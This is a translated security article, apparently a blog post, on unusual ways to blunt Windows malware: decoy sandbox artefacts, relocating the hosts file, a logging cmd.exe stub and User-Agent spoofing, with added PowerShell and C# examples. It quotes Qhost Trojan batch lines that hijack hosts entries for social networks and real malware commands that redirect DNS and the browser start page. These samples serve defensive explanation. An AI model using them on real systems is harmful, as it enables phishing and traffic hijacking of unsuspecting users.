Non-obvious malware protection methods
Much ink has been spilled in disputes and discussions about how to protect a computer from malware, and there are plenty of books and articles on the subject, most of which simply repeat each other in different words. For anyone with an interest in information security it is extremely hard to find anything in such discussions and articles about protection that they did not already know, or had simply never thought about... but, however arrogant it sounds, I will try to revive at least a little interest in this hackneyed topic and tell you about some non-obvious methods of protection, leaving out the senile grumbling about updating browser plugins in time, not clicking dodgy links, and so on.
In this short article about some interesting features of how malware functions, I urge you to abandon antivirus and the other means of self-defence: updates, program settings and attentiveness when clicking links and launching applications... Now put the word "NOT" in front of "urge", and everything falls into place.
This article should be taken only as an unusual overview of common patterns in malware behaviour, against which a defence can be built; a defence to be regarded more as "oh, cool, the malware doesn't work!" and as a curiosity picked up during malware research.
It is worth starting with the fact that the most non-obvious protection of all is working under a limited user account rather than an administrator; but since only a few are capable of such a sacrifice and the majority sit with admin rights, we will not come back to this unpleasant topic. Keep it in mind all the same: it may come in handy some day.
[offtopic] I am itching to shout that the Java plugin should be turned off and only enabled when needed; that viewing PDFs in the browser is not really necessary, so it is better to save the file to disk and open it in some obscure PDF viewer that is of no interest to anyone; that on XP autorun from flash drives can be switched off with a couple of lines in the registry; that ... but all these semi-obvious protection methods are known without me, so I ask forgiveness from everyone: from those who expected a complete analysis of PC protection, for the fact that there won't be one, and from those who expected only new things, for having mentioned these classics. [/offtopic]
I’m a cloud, a cloud, a cloud, but not a bear at all
Quite a few malware samples (or rather, their creators) are aware of the existence of antiviruses, virus analysts, automated analysis systems and the rest of the "corporation of good" infrastructure, and try in every way to complicate its life and prolong the life of their creations, using various technical tricks to hinder analysis and the writing of a detection signature. The simplest example is crypting/packing, which kills a whole herd of rabbits at once:
- if the malware gets detected, repack it and it is back in business
- disassemblers and static analyzers become useless (manual analysis with a debugger is needed)
- not every antivirus emulator will unwind even a simple cryptor
That example is the most banal one, meant only to show the direction in which hackers think (properly they should be called criminals, but somewhere along the way the tradition of substituting one concept for the other took hold...). The thought goes like this (from the malware's point of view): if I sense that I am being studied, I will not do any harm, so that they neither understand how I work nor see my evil nature. It recognises that it is under the microscope as follows:
1. Detection of execution under online behaviour-analysis services (Anubis, ThreatExpert, ...)
Performed by checking the computer name, the user name, the presence of certain DLLs in the address space, and the operating system's product key.
2. Virtual machine detection (VMware, sandboxes)
By looking for specific processes, registry keys and hardware, and by spotting differences from a normal system using various assembler tricks.
3. Debugger detection
Checking certain bytes in the environment, looking for a window, a process or a driver.
4. Detection of active/passive monitoring utilities (RegMon, FileMon, RegShot)
Usually implemented by looking for a window by its title.
The essence of this protection is simple to the point of ugliness: let the malware understand that it is being investigated, and it will abandon its evil intentions of its own accord. Moving from theory to practice (within reason), the following can be said, point by point:
1. The user name and the computer name are "sandbox".
2. Processes in the system: vmware.exe, VMwareTray.exe. The registry key HKLM\SYSTEM\ControlSet001\Services\vmware. The file vmnet.sys in the drivers directory.
3. Many look for the SoftICE driver: just install SoftICE, it will drop its driver and that's it (yes, they are still looking for it!). A window with the class "OllyDBG".
4. Windows with the titles "File Monitor - Sysinternals: www.sysinternals.com" and "Registry Monitor - Sysinternals: www.sysinternals.com".
In fact all of this is simple to do (if you want to): pick the names when installing the system, create a couple of keys and files, write a tool that keeps several invisible windows with the right class names and titles alive, and name the tool itself vmware.exe. Two caveats: the decoys only cover the artefacts a given sample happens to check, and a sample whose author chose "run anyway, but behave differently" instead of "exit" will still do something; and some legitimate software (copy protection, some installers) performs the same VM checks and may refuse to run on a machine dressed up like this.
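The following script is an added example, not part of the original article and not the author's tool: it sets up the decoy artefacts listed above and then checks for them the same way a sample would, so you can confirm what the malware will see. Assumptions of mine: it runs as administrator; the registry key, file name and window titles are the ones named in the article, while the service values and directory layout are my choices. A decoy window class ("OllyDBG") needs RegisterClass from native code, so the script creates only title-based decoy windows and reports the class check as a reminder of what is still missing; the process-name decoy (vmware.exe) is a matter of what you name the host executable.

```powershell
# Added example: analysis-environment decoys plus a self-check mirroring malware's own tests.
# Assumed: run as administrator. Key/file/titles are from the article; service values are mine.
Add-Type -AssemblyName System.Windows.Forms
Add-Type -Namespace Decoy -Name Native -MemberDefinition @'
[DllImport("user32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
public static extern IntPtr FindWindow(string lpClassName, string lpWindowName);
'@

$svcKey  = 'HKLM:\SYSTEM\CurrentControlSet\Services\vmware'   # CurrentControlSet -> the active ControlSet00X
$drvFile = Join-Path $env:SystemRoot 'System32\drivers\vmnet.sys'
$titles  = @(
    'File Monitor - Sysinternals: www.sysinternals.com',
    'Registry Monitor - Sysinternals: www.sysinternals.com'
)

function New-AnalysisDecoys {
    # A disabled kernel-driver service entry: the SCM never starts it, but any
    # "does Services\vmware exist" check succeeds; the empty vmnet.sys satisfies the file check.
    if (-not (Test-Path $svcKey)) {
        New-Item -Path $svcKey -Force | Out-Null
        New-ItemProperty -Path $svcKey -Name Type  -Value 1 -PropertyType DWord | Out-Null
        New-ItemProperty -Path $svcKey -Name Start -Value 4 -PropertyType DWord | Out-Null
        New-ItemProperty -Path $svcKey -Name ImagePath -Value 'System32\drivers\vmnet.sys' -PropertyType ExpandString | Out-Null
    }
    if (-not (Test-Path $drvFile)) { New-Item -Path $drvFile -ItemType File | Out-Null }

    # Top-level windows that are never shown: FindWindow ignores visibility,
    # it only needs a window with that title to exist.
    foreach ($t in $titles) {
        $f = New-Object System.Windows.Forms.Form
        $f.Text = $t
        $f.ShowInTaskbar = $false
        $null = $f.Handle      # creates the native window without showing it
        $f                     # returned so the caller holds a reference and the window stays alive
    }
}

function Test-AnalysisDecoys {
    # The same checks the article attributes to malware, from the defender's side.
    [pscustomobject]@{
        UserIsSandbox    = $env:USERNAME -eq 'sandbox'
        HostIsSandbox    = $env:COMPUTERNAME -eq 'sandbox'
        VmwareProcess    = [bool](Get-Process -Name vmware, VMwareTray -ErrorAction SilentlyContinue)
        VmwareServiceKey = Test-Path $svcKey
        VmnetDriverFile  = Test-Path $drvFile
        OllyDbgClass     = [Decoy.Native]::FindWindow('OllyDBG', $null) -ne [IntPtr]::Zero
        MonitorWindows   = -not [bool]($titles | Where-Object { [Decoy.Native]::FindWindow($null, $_) -eq [IntPtr]::Zero })
    }
}

$decoyWindows = New-AnalysisDecoys
Test-AnalysisDecoys | Format-List
# Keep pumping messages so the decoy windows survive until the script is stopped (Ctrl+C).
while ($true) { [System.Windows.Forms.Application]::DoEvents(); Start-Sleep -Milliseconds 250 }
```

Run it once after renaming the account and the computer to "sandbox": everything except OllyDbgClass should report True, and that line stays False until you add a window registered with the class name "OllyDBG". Writing under CurrentControlSet is deliberate: it is a link to whichever ControlSet00X is active, so the key also appears under the numbered set the article mentions.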
VKontakte has been switched off for non-payment of hosting
It may be funny to you, but many of our compatriots see something like this on their screens. Qhost-class Trojans are very popular: their whole job is to crudely edit the hosts file and delete themselves, so that the addresses of popular social networks (VKontakte, Odnoklassniki) resolve to a bogus IP address... and the person loses their login and password, and may even send an SMS.
Despite the technological simplicity of their creation, these Trojans bring their creators a good profit: minimal effort, and in a short time a lot of VKontakte accounts and money. The hosts file is edited either directly (open, write) or via shells (creating and running a bat/vbs file). It is all very simple: the file lies at a fixed path (C:\WINDOWS\system32\drivers\etc\hosts) and a few lines need to be appended to its end; that is the second programming lesson in any language after hello world! And here there is a little protective trick: the path to the etc folder is specified in the registry, and if you change it to another folder (move all the files from the old one there and wipe them from etc), the Trojan is in for a surprise...
Here is the value:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\DataBasePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\DataBasePath (and the other ControlSet00X keys accordingly).
CurrentControlSet is a link to whichever ControlSet00X is active, so changing the value there is enough; it is of type REG_EXPAND_SZ and defaults to %SystemRoot%\System32\drivers\etc. Bear in mind that anything else that writes hosts by the hard-coded path (admin scripts, some installers, other security tools) will be just as surprised as the Trojan.
The level of intelligence, and the nationality, of the authors of some Trojans of this class can be guessed even without looking at the code:
The bat files have roughly the following contents (simplified: the obfuscation has been removed, only the TANGLE variable is left to show how bat files are obfuscated):
REM hosts path hidden behind a variable; TANGLE splits the domain so "vk.com" never appears as a literal
SET TEATEATEA=%windir%\System32\drivers\etc\hosts
SET TANGLE=.co
echo 66.55.140.181 my.mail.ru>>%TEATEATEA%
echo 66.55.140.181 m.my.mail.ru>>%TEATEATEA%
echo 66.55.140.181 vk%TANGLE%m>>%TEATEATEA%
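The script below is an added example, not from the original article: it relocates the hosts database exactly as described (copy the etc directory, point DataBasePath at the copy) and, in one deviation from the article, leaves an empty hosts file at the old path instead of deleting it, so that a Trojan appending to the hard-coded path succeeds, changes nothing, and leaves you a record of what it tried. The test function does what the batch file above does and then resolves the name. Assumptions of mine: run as administrator and reboot before testing; the new directory name is arbitrary; vk.com and 66.55.140.181 are only the sample entries from the batch file, not a claim about what that address serves today; the other database files (services, protocol, networks) are left in place at the old path because tools hard-code those too.

```powershell
# Added example: relocate the hosts database via DataBasePath and turn the old file into a canary.
# Assumed: run as administrator, then reboot; directory name and sample entries are mine.
$oldDir = Join-Path $env:SystemRoot 'System32\drivers\etc'
$newDir = Join-Path $env:SystemRoot 'System32\drivers\etc_relocated'     # assumed name
$tcpip  = 'HKLM:\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters'     # CurrentControlSet -> active ControlSet00X

function Move-HostsDatabase {
    if (-not (Test-Path $newDir)) { Copy-Item -Path $oldDir -Destination $newDir -Recurse }
    # DataBasePath is REG_EXPAND_SZ and defaults to %SystemRoot%\System32\drivers\etc.
    Set-ItemProperty -Path $tcpip -Name DataBasePath -Value $newDir -Type ExpandString
    # Canary: the file a Qhost-style Trojan expects is still there, but nobody reads it.
    Set-Content -Path (Join-Path $oldDir 'hosts') -Value '# canary: nothing in this file is read by the resolver'
    Write-Warning 'Reboot so that every resolver re-reads DataBasePath before running Test-HostsRelocation.'
}

function Test-HostsRelocation {
    param([string]$Name = 'vk.com', [string]$Bogus = '66.55.140.181')
    # Do what the batch file does: append to the hard-coded path, then resolve the name.
    Add-Content -Path (Join-Path $oldDir 'hosts') -Value "$Bogus $Name"
    ipconfig /flushdns | Out-Null
    $addrs = [System.Net.Dns]::GetHostAddresses($Name) | ForEach-Object { $_.IPAddressToString }
    [pscustomobject]@{
        DataBasePath       = (Get-ItemProperty -Path $tcpip -Name DataBasePath).DataBasePath
        Resolved           = $addrs -join ', '
        HijackedViaOldPath = [bool]($addrs -contains $Bogus)
    }
}

function Get-HostsCanaryEntries {
    # Any address line in the old-path hosts file is an attempted hijack worth looking at.
    Get-Content (Join-Path $oldDir 'hosts') | Where-Object { $_ -match '^\s*\d' }
}

# Move-HostsDatabase        # step 1, then reboot
# Test-HostsRelocation      # step 2: expect HijackedViaOldPath = False
# Get-HostsCanaryEntries    # later: what tried to hijack you
```

Before relocating, the same test reports HijackedViaOldPath = True, which is the cheapest way to convince yourself that the registry value, and not the directory name, is what the resolver follows.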
Do you see the console? No? But it's there...
When a vulnerability is exploited, the shellcode very often does its work by driving cmd.exe, because it is easy to launch (the system even finds the path to it by itself), its name is short, and it is always present in the system, which matters a lot for shellcode, especially in light of the latest technologies that randomise the addresses of everything they can in the address space.
So our main task is to plant a kind of fat, suspiciously grunting pig in the hackers' path: replace the system cmd.exe (including its copies in dllcache, i386 and $NtServicePackUninstall$) with a stub of our own which, when called, saves the passed parameters to a log and shows an alert asking whether to continue; if you agree, it launches the normal cmd (previously placed next to it under a different name) with the same parameters.
Modern malware performs a lot of critical actions in the system by running cmd.exe with kilometre-long parameters (for example, making changes to that same hosts file).
The stub can be made smarter by teaching it to read from a config file which processes may launch cmd without an alert, passing their parameters straight through to the real cmd.
This idea took shape and grew stronger while watching the ever closer relationship between malware and cmd.exe: they have become best friends, and more than that, cmd is a real Taras Bulba to them ("I brought you into this world, I will take you out of it"): when an exploit fires, it is often cmd that launches the downloaded malware, self-deletion is also implemented through a bat file, and during its work the malware sometimes hands the shell some tasks too.
Separately, I want to note the existence of bodiless malware that has no exe file of its own in the system at all: Java does everything, the exploit tells it what to do and it obediently executes. Here is a real-life example (the java.exe process performs these actions; the first command points the LAN connection at a foreign DNS server, the second sets the Internet Explorer start page):
cmd.exe /C "ChCp 1251 & netsh interface ip set dns name="Local Area Connection" source=static addr=5.199.140.178"
reg add "hkcu\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_SZ /f /d "pc://dubsearch.ru"
For myself, for research purposes, such a utility has been written; if you need the source code or the tool itself, contact me and I will hand it over without any problem, I don't mind.
In this paragraph one more important detail is worth noting, which imposes strict limits on using this protection method on a real system: if you are a licensed user of the Immunity antivirus, our fake cmd.exe will produce a flood of prompts about launching batch files. Two more things a practitioner should expect: on XP, Windows File Protection restores cmd.exe from dllcache (hence the instruction to replace the copies too), while on Vista and later the file belongs to TrustedInstaller, SFC and updates will put the original back, and an antivirus may quarantine a modified system binary outright; and on 64-bit Windows there are two cmd.exe files, in System32 and in SysWOW64.
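Below is an added example, not the author's utility (which the article offers on request): a cmd.exe replacement stub of the kind described, written in C# and compiled to an executable from PowerShell with Add-Type. It logs every invocation with its parent process and raw arguments, asks with a dialog whether to continue unless the parent is on an allow-list, and then runs the real cmd with the arguments untouched. Assumptions of mine: the real cmd.exe has been copied to cmd_real.exe beside the stub, the allow-list is cmd_stub.allow next to it (one parent process name per line, without .exe), and the log is cmd_stub.log in the same directory; all three names are arbitrary.

```powershell
# Added example: a logging, prompting cmd.exe stub compiled from PowerShell.
# Assumed file names: cmd_real.exe (the original cmd), cmd_stub.allow, cmd_stub.log, all beside the stub.
$source = @'
using System;
using System.Diagnostics;
using System.IO;
using System.Management;
using System.Runtime.InteropServices;

public static class CmdStub
{
    [DllImport("user32.dll", CharSet = CharSet.Unicode)]
    static extern int MessageBox(IntPtr hWnd, string text, string caption, uint type);
    const uint MB_YESNO = 0x4, MB_ICONWARNING = 0x30, MB_TOPMOST = 0x40000;
    const int IDYES = 6;

    // Strip only the program token from the raw command line, so the real cmd receives the
    // arguments byte-for-byte (re-quoting args[] would break /C "..." lines with nested quotes).
    public static string ArgumentsOf(string commandLine)
    {
        string s = commandLine.TrimStart();
        int end = s.StartsWith("\"") ? s.IndexOf('"', 1) + 1 : s.IndexOf(' ');
        return end <= 0 ? "" : s.Substring(end).TrimStart();
    }

    // Parent process name via WMI; "?" if the parent is already gone (a common case: bat-file self-deletion).
    static string ParentName()
    {
        try
        {
            int pid = Process.GetCurrentProcess().Id;
            using (var q = new ManagementObjectSearcher("SELECT ParentProcessId FROM Win32_Process WHERE ProcessId=" + pid))
                foreach (ManagementObject o in q.Get())
                    return Process.GetProcessById(Convert.ToInt32(o["ParentProcessId"])).ProcessName;
        }
        catch { }
        return "?";
    }

    public static int Main()
    {
        string dir = AppDomain.CurrentDomain.BaseDirectory;
        string args = ArgumentsOf(Environment.CommandLine);
        string parent = ParentName();
        File.AppendAllText(Path.Combine(dir, "cmd_stub.log"),
            string.Format("{0:u} parent={1} args={2}\r\n", DateTime.Now, parent, args));

        string allowFile = Path.Combine(dir, "cmd_stub.allow");
        bool allowed = File.Exists(allowFile) && Array.Exists(File.ReadAllLines(allowFile),
            l => l.Trim().Equals(parent, StringComparison.OrdinalIgnoreCase));
        if (!allowed)
        {
            // A dialog rather than Console.ReadLine: the stub is frequently started with no console at all.
            string msg = "Process '" + parent + "' wants to run cmd.exe " + args + "\n\nContinue?";
            if (MessageBox(IntPtr.Zero, msg, "cmd.exe stub", MB_YESNO | MB_ICONWARNING | MB_TOPMOST) != IDYES)
                return 1;
        }
        var psi = new ProcessStartInfo(Path.Combine(dir, "cmd_real.exe"), args) { UseShellExecute = false };
        using (var p = Process.Start(psi)) { p.WaitForExit(); return p.ExitCode; }
    }
}
'@
Add-Type -TypeDefinition $source -ReferencedAssemblies System.Management `
         -OutputAssembly (Join-Path $PWD 'cmd_stub.exe') -OutputType ConsoleApplication
```

UseShellExecute = $false makes the child inherit the stub's standard handles, so a /C command that prints still prints, and the exit code is passed back to whoever launched cmd. Deploying it means copying the original cmd.exe to cmd_real.exe first, then replacing cmd.exe (on XP also the copies in dllcache, i386 and $NtServicePackUninstall$; on Vista and later after takeown and icacls, knowing that SFC and updates will eventually undo it). A WMI query on every cmd launch costs a noticeable fraction of a second, which is acceptable for a research box and one more reason not to run this on a production machine.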
Linux to the right, Windows to the left.
It is well known that most malware arrives on our computer through the window to the Internet, the browser and its plugins, so by putting protection at this stage (File, Work Offline... joke) we cut off the lion's share of threats. To do this, let's briefly look at how an exploit pack works:
1. The browser and its version, the operating system and the language are extracted from the User-Agent.
2. Depending on the result of step 1, it determines which plugins are present at all and exploits their vulnerabilities, or, if nothing suitable is among the available exploits, nothing bad happens.
Of course, there are exceptions where, regardless of anything, all the exploits are pushed into the page code at once (at least something will work), but most exploit packs keep statistics and country records, have a pretty interface and other goodies and settings. Hence the protection philosophy: change the User-Agent and state in it something for which there is definitely no exploit in stock, for example Linux. Ideally, of course, you would replace the User-Agent entirely with that of some Linux browser, but in theory this can lead to slight distortions of pages on some sites, although I did not notice any. In Firefox this is the general.useragent.override preference (about:config or user.js); Chrome takes a --user-agent= command-line switch. Keep in mind what this does and does not cover: the plugin-detection step runs as JavaScript in your browser and sees the real plugins, so the trick only helps against kits that branch on the User-Agent before probing, which is exactly the behaviour described next.
All the popular bundles (the same Blackhole exploit kit, for instance) will instantly send you off to Google without even trying an exploit on your browser.
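The following is an added example, not code from Blackhole or any real exploit kit: the first triage step described above, reduced to a User-Agent parser and a decision, run over a few constructed User-Agent strings so you can see which part of the string the spoof has to change. The kit policy (Windows plus a recognised browser gets the plugin-detection page, everyone else is bounced) is my simplification of the behaviour the article describes; the sample strings are constructed, not captured traffic.

```powershell
# Added example: the User-Agent triage an exploit kit performs before probing plugins.
# Constructed sample strings; the kit policy is an assumed simplification.
function Get-UaProfile {
    param([Parameter(Mandatory)][string]$UserAgent)
    # The OS token lives in the parenthesised comment; that is what a kit keys on.
    $os = switch -Regex ($UserAgent) {
        'Windows NT (\d+\.\d+)' { "Windows NT $($Matches[1])"; break }
        'Windows'               { 'Windows (other)'; break }
        'Mac OS X'              { 'macOS'; break }
        'Linux|X11'             { 'Linux'; break }
        default                 { 'unknown' }
    }
    $browser = switch -Regex ($UserAgent) {
        'MSIE (\d+)'    { "IE $($Matches[1])"; break }
        'Firefox/(\d+)' { "Firefox $($Matches[1])"; break }
        'Chrome/(\d+)'  { "Chrome $($Matches[1])"; break }
        default         { 'unknown' }
    }
    # Older Gecko strings carry the locale as "en-US" inside the parentheses; newer ones omit it.
    $lang = if ($UserAgent -cmatch '\b([a-z]{2}-[A-Z]{2})\b') { $Matches[1] } else { '?' }
    [pscustomobject]@{ OS = $os; Browser = $browser; Lang = $lang }
}

function Select-KitAction {
    param([Parameter(Mandatory)][string]$UserAgent)
    $p = Get-UaProfile $UserAgent
    # Assumed policy: only Windows visitors with a recognised browser are worth a plugin probe.
    $action = 'redirect to google.com'
    if ($p.OS -like 'Windows*' -and $p.Browser -ne 'unknown') { $action = 'serve plugin-detection page' }
    $p | Add-Member -NotePropertyName Action -NotePropertyValue $action -PassThru
}

# Constructed sample User-Agent strings (not captured traffic).
$samples = @(
    'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)',
    'Mozilla/5.0 (Windows NT 5.1; rv:10.0) Gecko/20100101 Firefox/10.0',
    'Mozilla/5.0 (Windows NT 5.1; rv:10.0) Gecko/20100101 Firefox/10.0 Linux',   # naive spoof: OS token untouched
    'Mozilla/5.0 (X11; Linux x86_64; rv:10.0) Gecko/20100101 Firefox/10.0'       # what the browser should claim
)
$samples | ForEach-Object { Select-KitAction $_ } | Format-Table -AutoSize
```

The third sample is the point of the exercise: tacking "Linux" onto the end changes nothing, because the parser stops at the first match of "Windows NT" in the comment; only the fourth string, with the OS token itself replaced, takes the redirect branch.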
Instead of a conclusion
The article should in no way be taken as a call to abandon antivirus and the other sensible means of protection you all know about. It is just that now, in addition to them, you can either use the methods I have described or not, but at least know that such obstacles exist on the malware's life path.